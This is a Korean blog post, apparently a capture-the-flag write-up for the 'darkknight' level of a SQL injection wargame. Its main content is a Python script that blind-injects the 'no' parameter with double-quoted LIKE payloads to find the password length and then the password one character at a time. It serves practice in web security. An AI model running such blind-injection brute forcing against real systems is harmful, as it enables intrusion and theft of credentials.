ABOUT ME

    -

    Today
    -
    Yesterday
    -
    Total
    -
    • [load of sql injection] darkknight
      webhacking/load of sql injection 2018. 11. 17. 02:12
      반응형

      Solve code:

      싱글 쿼터문자가 필터된다. 하지만 더블 쿼터는 필터되지 않는다.

      import requests

      url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
      list1 = []

      cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' }

      for o in range(0,100):
          for i in range(1,10): ## 패스워드 길이 찾기
              text = "4"
              text1 = "4 || length(pw) < "+str(i)+" && length(no) < "+str(o)
              params = { 'pw' : text, 'no' : text1}
              res = requests.get( url, params = params, cookies = cookies )
          if( 'Hello admin' in res.text ):
              print(res.text)
              break
          
      for j in range(0, i-1):
          for k in  range(ord('0'), ord('z')):
              text_main = "".join(list1)
              text = "4"
              text1 = '1 || pw Like "'+text_main+chr(k)+'%" -- '
              params = { 'pw' : text, 'no' : text1 }
              res = requests.get( url, params = params, cookies = cookies )
              if( 'Hello admin' in res.text):
                  print(res.text)
                  print(chr(k))
                  list1.append(chr(k))
                  break
              
      print("Solve == id : "+text_main+chr(k)+" no : "+str(o-1))


      반응형

      'webhacking > load of sql injection' 카테고리의 다른 글

      [load of sql injection] giant  (0) 2018.11.17
      [load of sql injection] bugbear  (0) 2018.11.17
      [load of sql injection] golem  (0) 2018.11.17
      [load of sql injection] skeleton  (0) 2018.11.17
      [load of sql injection] vampire  (0) 2018.11.17

      관련글 관련글 더보기

    Designed by Tistory.

    티스토리툴바